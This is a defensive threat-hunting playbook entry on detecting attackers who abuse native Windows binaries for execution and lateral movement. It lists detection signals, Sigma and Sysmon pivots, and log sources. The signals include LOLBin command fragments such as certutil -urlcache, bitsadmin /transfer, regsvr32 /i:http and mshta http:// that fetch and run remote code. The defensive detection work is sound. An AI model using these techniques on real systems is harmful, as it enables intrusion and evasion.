Attacker Living Off the Land with Native Binaries
The attacker relies on legitimate system binaries (PowerShell, certutil, bitsadmin, regsvr32, rundll32, mshta, wmic) for execution and lateral movement. File-reputation and signature-based detection fails because the binaries are legitimate; detection must shift to behavioral anomaly, parent-child process analysis, and command-line context.
Signals
- •High-volume execution of native Windows binaries (PowerShell.exe, certutil.exe) in unusual contexts or locations
- •Parent-child process chains like w3wp.exe -> cmd.exe -> powershell.exe or winword.exe -> wscript.exe
- •Command lines with unusual flag combinations (certutil -urlcache, bitsadmin /transfer, regsvr32 /s /n /u /i:http)
- •Binaries executing outside their typical use case (certutil downloading, rundll32 loading HTTP-hosted DLLs)
Pivot Actions
- 1.Deploy Sigma rule packs tuned for LOLBin abuse (LOLBAS project mappings) via Chainsaw/Hayabusa against EVTX or via SIEM
- 2.Build behavioral detection on parent-process anomalies rather than binary hashes -- PowerShell spawned by Excel is suspicious; PowerShell spawned by explorer is usually legitimate
- 3.Enable PowerShell script-block logging (Event 4104), module logging (Event 4103), and AMSI integration to capture actual scripts even when only LOLBins are invoked
- 4.Hunt for command-line patterns characteristic of specific LOLBin abuse: encoded PowerShell, certutil -urlcache -f, bitsadmin /transfer, mshta http://
Alternate Evidence Sources
- •LOLBAS project (lolbas-project.github.io) for comprehensive LOLBin-to-technique mappings
- •Sigma community rules for LOLBin abuse detection
- •Sysmon with full command-line logging and ParentCommandLine fields
- •PowerShell operational logs (Microsoft-Windows-PowerShell/Operational) with script-block logging enabled